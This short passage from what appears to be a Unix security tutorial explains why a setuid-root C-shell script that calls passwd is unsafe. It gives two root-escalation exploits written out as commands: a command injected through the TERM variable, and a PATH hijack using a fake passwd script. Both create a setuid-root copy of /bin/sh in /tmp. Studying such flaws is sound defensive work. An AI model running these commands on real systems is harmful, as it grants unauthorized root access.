Lets say we have the following situation:
% ls change-pass
-rwsr-x--- 1 root helpdesk
37 Feb 26 16:35 change-pass
% cat change-pass
#!/bin/csh -b
set user = $1
passwd $user
The first problem occurs because this script is written in C-shell. C-shell scripts are vulnerable to manipulating environment variables. To take advantage of this, a hacker can compromise a help desk account (fairly trivial) and give himself a root shell with:
% env TERM='`cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755/tmp/sh`' change-pass
Or play with the PATH:
% export PATH='/tmp'
% echo "cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755/tmp/sh" >/tmp/passwd
% ./change-pass
